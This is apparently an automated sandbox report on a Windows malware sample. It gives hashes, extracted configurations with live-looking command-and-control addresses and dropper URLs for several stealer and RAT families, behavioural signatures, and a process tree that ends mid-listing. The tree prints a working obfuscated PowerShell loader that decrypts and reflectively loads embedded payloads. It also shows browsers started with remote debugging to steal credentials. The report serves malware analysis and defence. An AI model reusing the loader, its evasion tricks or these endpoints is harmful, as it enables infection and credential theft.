Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-02-2025 02:41

General

  • Target

    5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe

  • Size

    2.1MB

  • MD5

    8790df5ba7484035a89b0c8dfbfb4920

  • SHA1

    bd9203c4b60a39e4fd95859fb2d7e3c586839ece

  • SHA256

    5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7

  • SHA512

    dc4f69714d6f3ffb26072511b54060715e12520f70e4fdd2143a1587fd0d0c1a9ebdb38a2194bd54b97fc5228e56f763bacbd2275844ff1364c10ca9e06aa634

  • SSDEEP

    49152:Luhs9y+YruLgoFPcEwNuQoOrYYrwfnvBf6:aK9y+YruLZPQFU3Jf6

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:7000

Mutex

0HzpJoisb4u9PgIO

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 20 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 41 IoCs
  • Identifies Wine through registry keys 2 TTPs 18 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of FindShellTrayWindow 55 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe
    "C:\Users\Admin\AppData\Local\Temp\5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:888
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Users\Admin\AppData\Local\Temp\1014060001\a4ed447d2f.exe
        "C:\Users\Admin\AppData\Local\Temp\1014060001\a4ed447d2f.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4060
        • C:\Users\Admin\AppData\Local\Temp\1014060001\a4ed447d2f.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\a4ed447d2f.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1356
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 968
          4⤵
          • Program crash
          PID:4732
      • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
        "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1088
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4060
      • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
        "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:5400
      • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
        "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2552
        • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
          "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4908
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 968
          4⤵
          • Program crash
          PID:6016
      • C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe
        "C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:740
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops startup file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:6024
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5076
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1016
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            5⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5820
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3928
      • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
        "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:888
      • C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1880
      • C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe
        "C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:1788
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4312
      • C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
        "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1584
      • C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe
        "C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1044
      • C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe
        "C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:832
      • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
        "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:1156
        • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          PID:636
        • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:3732
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 972
          4⤵
          • Program crash
          PID:4416
      • C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe
        "C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1916
      • C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe
        "C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:2984
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1452
          4⤵
          • Program crash
          PID:5856
      • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
        "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:5276
        • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
          4⤵
          • Executes dropped EXE
          PID:2072
        • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          PID:1764
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:4180
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xe4,0x104,0x7ffdfcfecc40,0x7ffdfcfecc4c,0x7ffdfcfecc58
              6⤵
                PID:4996
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2056,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1924 /prefetch:2
                6⤵
                  PID:3092
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2088 /prefetch:3
                  6⤵
                    PID:5580
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2032 /prefetch:8
                    6⤵
                      PID:4380
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3188 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:4960
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:5960
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4268 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:2476
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:8
                      6⤵
                        PID:3556
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4800 /prefetch:8
                        6⤵
                          PID:1524
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4788,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:8
                          6⤵
                            PID:4672
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4704 /prefetch:8
                            6⤵
                              PID:3748
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            5⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:4596
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfcff46f8,0x7ffdfcff4708,0x7ffdfcff4718
                              6⤵
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              PID:5552
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,945146037853999201,7580738182624539173,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
                              6⤵
                                PID:3348
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,945146037853999201,7580738182624539173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
                                6⤵
                                  PID:5156
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,945146037853999201,7580738182624539173,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
                                  6⤵
                                    PID:1488
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2084,945146037853999201,7580738182624539173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:6096
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2084,945146037853999201,7580738182624539173,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:376
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
